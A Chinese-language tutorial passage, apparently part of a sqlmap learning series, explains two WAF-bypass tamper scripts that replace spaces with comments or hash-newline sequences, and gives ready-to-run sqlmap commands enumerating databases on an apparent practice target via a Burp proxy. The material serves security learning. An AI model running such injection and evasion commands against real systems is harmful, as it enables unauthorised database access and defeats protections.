sqlmap从入门到精通-第七章-7-19 绕过WAF脚本-space2morecomment.py&space2morehash.py

40. space2morecomment.py脚本

使用/**_**/替代空格 适用于所有数据库

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2morecomment.py" --proxy="http://127.0.0.1:8080" -batch

是可以注入，看看burp的抓包情况

 发现确实是将空格转换为/**_**/

==================================================================================================================================================

41. space2morehash.py脚本

这个与space2hash.py类似，使用注释符#(%23) 再就是使用随机的字符串和一个换行符(%0A)来替换空格，适用于所有数据库

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2morehash.py" --proxy="http://127.0.0.1:8080" -batch

 发现是可以注入的，burp抓包情况也是可以清楚的看到效果

迷茫的人生，需要不断努力，才能看清远方模糊的志向！